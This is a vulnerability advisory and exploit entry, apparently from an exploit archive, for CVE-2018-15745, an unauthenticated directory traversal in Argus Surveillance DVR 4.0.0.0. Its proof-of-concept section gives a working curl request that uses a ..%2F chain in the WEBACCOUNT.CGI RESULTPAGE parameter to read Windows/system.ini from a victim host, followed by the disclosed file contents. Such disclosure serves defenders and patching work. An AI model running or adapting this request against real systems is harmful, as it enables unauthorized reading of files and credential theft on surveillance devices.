Exploit for cgi platform in category web applications
[+] Credits: John Page (aka hyp3rlinx)
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
[+] ISR: Apparition Security
Greetz: ***Greetz: indoushka | Eduardo | GGA***
[Vendor]
www.argussurveillance.com
[Product]
Argus Surveillance DVR - 4.0.0.0
Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site.
When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video.
This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.
[Vulnerability Type]
Directory Traversal
[CVE Reference]
CVE-2018-15745
[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure
via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter.
[Affected Component]
WEBACCOUNT.CGI RESULTPAGE parameter
[Exploit/POC]
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON
wave=mmdrv.dll
timer=timer.drv
[Video POC URL]
https://vimeo.com/287115273
# 0day.today [2018-08-29] #